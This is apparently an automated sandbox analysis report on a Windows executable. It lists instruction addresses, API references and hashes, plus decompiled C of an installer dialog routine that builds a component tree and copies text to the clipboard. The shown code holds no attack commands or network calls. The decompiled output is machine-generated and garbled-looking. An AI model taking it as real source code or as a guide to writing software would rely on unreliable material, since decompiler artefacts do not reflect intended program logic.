                                                                                                0x004050b9
                                                                                                0x004050bf
                                                                                                0x004050c2
                                                                                                0x004050c2
                                                                                                0x004050dd
                                                                                                0x004050e5
                                                                                                0x004050e6
                                                                                                0x004050e8
                                                                                                0x004050f1
                                                                                                0x004050f4
                                                                                                0x004050fb
                                                                                                0x00405102
                                                                                                0x0040510a
                                                                                                0x0040510a
                                                                                                0x00405118
                                                                                                0x0040511e
                                                                                                0x00405121
                                                                                                0x00405121
                                                                                                0x00405128
                                                                                                0x0040512e
                                                                                                0x00405137
                                                                                                0x0040513e
                                                                                                0x00405147
                                                                                                0x00405149
                                                                                                0x0040514c
                                                                                                0x0040515b
                                                                                                0x0040515d
                                                                                                0x00405163
                                                                                                0x00405164
                                                                                                0x00405165
                                                                                                0x00405165
                                                                                                0x0040516d
                                                                                                0x00405178
                                                                                                0x0040517e
                                                                                                0x0040517e
                                                                                                0x00000000
                                                                                                0x004050e8
                                                                                                0x00405018
                                                                                                0x0040501e
                                                                                                0x0040504e
                                                                                                0x00405050
                                                                                                0x00405056
                                                                                                0x00405061
                                                                                                0x00405061
                                                                                                0x00405068
                                                                                                0x00000000
                                                                                                0x00405068
                                                                                                0x00405022
                                                                                                0x0040502c
                                                                                                0x00000000
                                                                                                0x00404ff3
                                                                                                0x00404ff3
                                                                                                0x00404ff9
                                                                                                0x00405031
                                                                                                0x00000000
                                                                                                0x0040503a
                                                                                                0x00405002
                                                                                                0x00405007
                                                                                                0x0040500a
                                                                                                0x00000000
                                                                                                0x0040500a
                                                                                                0x00404ff1
                                                                                                0x00404e28
                                                                                                0x00404e2c
                                                                                                0x00404e35
                                                                                                0x00404e3c
                                                                                                0x00404e3f
                                                                                                0x00404e42
                                                                                                0x00404e45
                                                                                                0x00404e46
                                                                                                0x00404e47
                                                                                                0x00404e60
                                                                                                0x00404e63
                                                                                                0x00404e6d
                                                                                                0x00404e7c
                                                                                                0x00404e84
                                                                                                0x00404e8c
                                                                                                0x00404e91
                                                                                                0x00404e94
                                                                                                0x00404ea0
                                                                                                0x00404ea9
                                                                                                0x00404eb2
                                                                                                0x00404ed5
                                                                                                0x00404edb
                                                                                                0x00404eec
                                                                                                0x00404ef1
                                                                                                0x00404eff
                                                                                                0x00404f0d
                                                                                                0x00404f0d
                                                                                                0x00404f12
                                                                                                0x00404f20
                                                                                                0x00404f20
                                                                                                0x00404f25
                                                                                                0x00404f28
                                                                                                0x00404f2d
                                                                                                0x00404f39
                                                                                                0x00404f42
                                                                                                0x00404f4f
                                                                                                0x00404f5e
                                                                                                0x00404f51
                                                                                                0x00404f56
                                                                                                0x00404f56
                                                                                                0x00404f6a
                                                                                                0x00404f6a
                                                                                                0x00404f7e
                                                                                                0x00404f87
                                                                                                0x00404f90
                                                                                                0x00404fa0
                                                                                                0x00404fac
                                                                                                0x00404fac
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • GetDlgItem.USER32 ref: 00404E66
                                                                                                • GetDlgItem.USER32 ref: 00404E75
                                                                                                • GetClientRect.USER32 ref: 00404EB2
                                                                                                • GetSystemMetrics.USER32 ref: 00404EBA
                                                                                                • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404EDB
                                                                                                • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404EEC
                                                                                                • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404EFF
                                                                                                • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404F0D
                                                                                                • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404F20
                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00404F42
                                                                                                • ShowWindow.USER32(?,00000008), ref: 00404F56
                                                                                                • GetDlgItem.USER32 ref: 00404F77
                                                                                                • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00404F87
                                                                                                • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00404FA0
                                                                                                • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00404FAC
                                                                                                • GetDlgItem.USER32 ref: 00404E84
                                                                                                  • Part of subcall function 00403D12: SendMessageA.USER32(00000028,?,00000001,00403B43), ref: 00403D20
                                                                                                • GetDlgItem.USER32 ref: 00404FC9
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00004D9B,00000000), ref: 00404FD7
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00404FDE
                                                                                                • ShowWindow.USER32(00000000), ref: 00405002
                                                                                                • ShowWindow.USER32(00000000,00000008), ref: 00405007
                                                                                                • ShowWindow.USER32(00000008), ref: 0040504E
                                                                                                • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 00405080
                                                                                                • CreatePopupMenu.USER32 ref: 00405091
                                                                                                • AppendMenuA.USER32 ref: 004050A6
                                                                                                • GetWindowRect.USER32 ref: 004050B9
                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004050DD
                                                                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405118
                                                                                                • OpenClipboard.USER32(00000000), ref: 00405128
                                                                                                • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 0040512E
                                                                                                • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405137
                                                                                                • GlobalLock.KERNEL32 ref: 00405141
                                                                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405155
                                                                                                • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040516D
                                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 00405178
                                                                                                • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 0040517E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                • String ID: {
                                                                                                • API String ID: 590372296-366298937
                                                                                                • Opcode ID: 3d08310bbd43469a5120837c1ff2279d190d817ca8ed5af4582344c2043299ca
                                                                                                • Instruction ID: 6b58894f072d387ff385a1976498fa71d2bdad0bf2474ce794c2d1da48ffa65f
                                                                                                • Opcode Fuzzy Hash: 3d08310bbd43469a5120837c1ff2279d190d817ca8ed5af4582344c2043299ca
                                                                                                • Instruction Fuzzy Hash: 48A14971900208BFEB219F61DD89AAE7F79FB08355F00407AFA05BA1A0C7755E41DFA9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00404618, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 98%
                                                                                                			E00404618(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x42eb88; // 0x5ff7d4
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x42eb70; // 0x5ff628
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x42eb79 & 0x00000002;
							if(( *0x42eb79 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404598(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x42eb78; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x429fb4;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x429fcc;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x429fb4 = _t315;
									 *0x429fcc = _t315;
									 *0x42ebc0 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x42eb79 & 0x00000001;
										if(( *0x42eb79 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x42eb8c - _t315; // 0x2
										_v32 =  *0x429fcc;
										_t196 =  *0x42eb88; // 0x5ff7d4
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42e33c; // 0x6055b9
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E004044B6(0x3ff, 0xfffffffb, E0040456B(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x5ff7dc
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x5ff7ec
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x42eb8c; // 0x2
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x429fcc);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x42ebc0 = _a4;
					_t247 =  *0x42eb8c; // 0x2
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x429fcc = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x42eb60, 0x6e);
					 *0x429fc0 =  *0x429fc0 | 0xffffffff;
					_v24 = _t250;
					 *0x429fc8 = SetWindowLongA(_v8, 0xfffffffc, E00404C19);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x429fb4 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x429fb4);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E0040594D(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403CDD(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403CDD(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x42eb8c - _t318; // 0x2
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x429fcc + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x429fcc + _t318 * 4) = _t274;
									_t288 =  *( *0x429fcc + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x42eb8c; // 0x2
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403D12(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403D12(_v12);
								L89:
								return E00403D44(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}






































































                                                                                                0x00404636
                                                                                                0x0040463c
                                                                                                0x0040463e
                                                                                                0x00404644
                                                                                                0x0040464a
                                                                                                0x0040464d
                                                                                                0x00404657
                                                                                                0x00404660
                                                                                                0x00404663
                                                                                                0x00404666
                                                                                                0x0040488e
                                                                                                0x0040488e
                                                                                                0x00404895
                                                                                                0x004048a9
                                                                                                0x00404897
                                                                                                0x00404899
                                                                                                0x0040489c
                                                                                                0x0040489d
                                                                                                0x004048a4
                                                                                                0x004048a4
                                                                                                0x004048ac
                                                                                                0x004048b5
                                                                                                0x004048c0
                                                                                                0x004048c0
                                                                                                0x004048c3
                                                                                                0x004048c6
                                                                                                0x004048d5
                                                                                                0x004048d5
                                                                                                0x004048dc
                                                                                                0x00404954
                                                                                                0x00404954
                                                                                                0x00404957
                                                                                                0x00404959
                                                                                                0x0040495c
                                                                                                0x00404963
                                                                                                0x00404971
                                                                                                0x00404971
                                                                                                0x00404973
                                                                                                0x00404976
                                                                                                0x0040497d
                                                                                                0x0040497f
                                                                                                0x00404983
                                                                                                0x004049a0
                                                                                                0x004049a4
                                                                                                0x004049a4
                                                                                                0x00404985
                                                                                                0x00404992
                                                                                                0x00404992
                                                                                                0x00404983
                                                                                                0x0040497d
                                                                                                0x00000000
                                                                                                0x00404957
                                                                                                0x004048de
                                                                                                0x004048e1
                                                                                                0x004048ec
                                                                                                0x004048ee
                                                                                                0x004048f1
                                                                                                0x004048f8
                                                                                                0x004048fd
                                                                                                0x004048ff
                                                                                                0x00404909
                                                                                                0x00404909
                                                                                                0x0040490d
                                                                                                0x0040490f
                                                                                                0x00404912
                                                                                                0x00404914
                                                                                                0x00404917
                                                                                                0x0040492d
                                                                                                0x0040492d
                                                                                                0x00404919
                                                                                                0x00404919
                                                                                                0x0040491f
                                                                                                0x00404921
                                                                                                0x00404928
                                                                                                0x00404923
                                                                                                0x00404923
                                                                                                0x00404923
                                                                                                0x00404921
                                                                                                0x00404931
                                                                                                0x00404933
                                                                                                0x00404938
                                                                                                0x00404941
                                                                                                0x00404942
                                                                                                0x0040494c
                                                                                                0x0040494c
                                                                                                0x0040494e
                                                                                                0x00404951
                                                                                                0x00404951
                                                                                                0x00404912
                                                                                                0x00000000
                                                                                                0x004048ff
                                                                                                0x004048e3
                                                                                                0x004048e6
                                                                                                0x004048ea
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004048ea
                                                                                                0x004048c8
                                                                                                0x004048cf
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004048b7
                                                                                                0x004048b7
                                                                                                0x004048ba
                                                                                                0x004049a7
                                                                                                0x004049a7
                                                                                                0x004049ae
                                                                                                0x00404a22
                                                                                                0x00404a22
                                                                                                0x00404a29
                                                                                                0x00404a35
                                                                                                0x00404a35
                                                                                                0x00404a37
                                                                                                0x00404a3e
                                                                                                0x00404a40
                                                                                                0x00404a45
                                                                                                0x00404a47
                                                                                                0x00404a4a
                                                                                                0x00404a4a
                                                                                                0x00404a50
                                                                                                0x00404a55
                                                                                                0x00404a57
                                                                                                0x00404a5a
                                                                                                0x00404a5a
                                                                                                0x00404a60
                                                                                                0x00404a66
                                                                                                0x00404a6c
                                                                                                0x00404a6c
                                                                                                0x00404a72
                                                                                                0x00404a79
                                                                                                0x00404bc6
                                                                                                0x00404bc6
                                                                                                0x00404bcd
                                                                                                0x00404bcf
                                                                                                0x00404bd6
                                                                                                0x00404bda
                                                                                                0x00404be7
                                                                                                0x00404be7
                                                                                                0x00404bea
                                                                                                0x00404bf0
                                                                                                0x00404c02
                                                                                                0x00404c02
                                                                                                0x00404bd6
                                                                                                0x00000000
                                                                                                0x00404a7f
                                                                                                0x00404a81
                                                                                                0x00404a86
                                                                                                0x00404a89
                                                                                                0x00404a8d
                                                                                                0x00404a8d
                                                                                                0x00404a92
                                                                                                0x00404a95
                                                                                                0x00404ad6
                                                                                                0x00404ad8
                                                                                                0x00404ae2
                                                                                                0x00404ae8
                                                                                                0x00404aeb
                                                                                                0x00404af0
                                                                                                0x00404af7
                                                                                                0x00404afa
                                                                                                0x00404b9c
                                                                                                0x00404ba2
                                                                                                0x00404ba8
                                                                                                0x00404bad
                                                                                                0x00404bb0
                                                                                                0x00404bc1
                                                                                                0x00404bc1
                                                                                                0x00000000
                                                                                                0x00404b00
                                                                                                0x00404b00
                                                                                                0x00404b00
                                                                                                0x00404b03
                                                                                                0x00404b09
                                                                                                0x00404b0c
                                                                                                0x00404b0e
                                                                                                0x00404b10
                                                                                                0x00404b12
                                                                                                0x00404b15
                                                                                                0x00404b18
                                                                                                0x00404b1f
                                                                                                0x00404b21
                                                                                                0x00404b24
                                                                                                0x00404b2b
                                                                                                0x00404b2e
                                                                                                0x00404b2e
                                                                                                0x00404b2e
                                                                                                0x00404b2e
                                                                                                0x00404b32
                                                                                                0x00404b35
                                                                                                0x00404b41
                                                                                                0x00404b42
                                                                                                0x00404b45
                                                                                                0x00404b47
                                                                                                0x00404b47
                                                                                                0x00404b47
                                                                                                0x00404b37
                                                                                                0x00404b39
                                                                                                0x00404b39
                                                                                                0x00404b66
                                                                                                0x00404b66
                                                                                                0x00404b67
                                                                                                0x00404b73
                                                                                                0x00404b82
                                                                                                0x00404b82
                                                                                                0x00404b84
                                                                                                0x00404b87
                                                                                                0x00404b90
                                                                                                0x00404b90
                                                                                                0x00000000
                                                                                                0x00404b03
                                                                                                0x00404a97
                                                                                                0x00404aa2
                                                                                                0x00404aa5
                                                                                                0x00404aaa
                                                                                                0x00404aac
                                                                                                0x00404aae
                                                                                                0x00404ab0
                                                                                                0x00404ac0
                                                                                                0x00404aca
                                                                                                0x00404acc
                                                                                                0x00404acf
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00404ab2
                                                                                                0x00404ab2
                                                                                                0x00404ab2
                                                                                                0x00404ab5
                                                                                                0x00404ab8
                                                                                                0x00404aba
                                                                                                0x00404aba
                                                                                                0x00404aba
                                                                                                0x00404abb
                                                                                                0x00404abc
                                                                                                0x00404abc
                                                                                                0x00000000
                                                                                                0x00404ab2
                                                                                                0x00404a95
                                                                                                0x00404a79
                                                                                                0x004049b0
                                                                                                0x004049b6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004049c2
                                                                                                0x004049c6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004049d6
                                                                                                0x004049d8
                                                                                                0x004049db
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004049ed
                                                                                                0x004049ef
                                                                                                0x004049f2
                                                                                                0x004049fc
                                                                                                0x004049fe
                                                                                                0x004049ff
                                                                                                0x00404a00
                                                                                                0x00404a0f
                                                                                                0x00404a11
                                                                                                0x00404a18
                                                                                                0x00404a1b
                                                                                                0x00000000
                                                                                                0x00404a1b
                                                                                                0x004049f4
                                                                                                0x004049f7
                                                                                                0x004049fa
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004049fa
                                                                                                0x00000000
                                                                                                0x004048ba
                                                                                                0x0040466c
                                                                                                0x00404671
                                                                                                0x00404676
                                                                                                0x0040467b
                                                                                                0x0040467c
                                                                                                0x00404685
                                                                                                0x00404690
                                                                                                0x0040469b
                                                                                                0x004046a1
                                                                                                0x004046af
                                                                                                0x004046c4
                                                                                                0x004046c9
                                                                                                0x004046d4
                                                                                                0x004046dd
                                                                                                0x004046f2
                                                                                                0x00404703
                                                                                                0x00404710
                                                                                                0x00404710
                                                                                                0x00404715
                                                                                                0x0040471b
                                                                                                0x0040471d
                                                                                                0x00404720
                                                                                                0x00404725
                                                                                                0x0040472a
                                                                                                0x0040472c
                                                                                                0x0040472c
                                                                                                0x0040474c
                                                                                                0x0040474c
                                                                                                0x0040474e
                                                                                                0x0040474f
                                                                                                0x00404754
                                                                                                0x00404757
                                                                                                0x0040475a
                                                                                                0x0040475e
                                                                                                0x00404763
                                                                                                0x00404768
                                                                                                0x0040476c
                                                                                                0x00404771
                                                                                                0x00404776
                                                                                                0x00404778
                                                                                                0x0040477a
                                                                                                0x00404780
                                                                                                0x0040484a
                                                                                                0x0040485d
                                                                                                0x00000000
                                                                                                0x00404786
                                                                                                0x00404789
                                                                                                0x0040478c
                                                                                                0x0040478f
                                                                                                0x0040478f
                                                                                                0x00404795
                                                                                                0x0040479b
                                                                                                0x0040479e
                                                                                                0x004047a4
                                                                                                0x004047a5
                                                                                                0x004047aa
                                                                                                0x004047b3
                                                                                                0x004047ba
                                                                                                0x004047bd
                                                                                                0x004047c0
                                                                                                0x004047c3
                                                                                                0x004047fd
                                                                                                0x004047ff
                                                                                                0x00404828
                                                                                                0x00404801
                                                                                                0x0040480e
                                                                                                0x0040480e
                                                                                                0x004047c5
                                                                                                0x004047c8
                                                                                                0x004047d7
                                                                                                0x004047e1
                                                                                                0x004047e9
                                                                                                0x004047f0
                                                                                                0x004047f8
                                                                                                0x004047f8
                                                                                                0x004047c3
                                                                                                0x0040482e
                                                                                                0x0040482f
                                                                                                0x00404835
                                                                                                0x0040483b
                                                                                                0x0040483b
                                                                                                0x00404848
                                                                                                0x00404863
                                                                                                0x00404867
                                                                                                0x00404884
                                                                                                0x00404889
                                                                                                0x0040488c
                                                                                                0x0040488c
                                                                                                0x00000000
                                                                                                0x00404869
                                                                                                0x0040486e
                                                                                                0x00404877
                                                                                                0x00404c04
                                                                                                0x00404c16
                                                                                                0x00404c16
                                                                                                0x00404867
                                                                                                0x00000000
                                                                                                0x00404848
                                                                                                0x00404780

                                                                                                APIs
                                                                                                • GetDlgItem.USER32 ref: 0040462F
                                                                                                • GetDlgItem.USER32 ref: 0040463C
                                                                                                • GlobalAlloc.KERNEL32(00000040,00000002), ref: 00404688
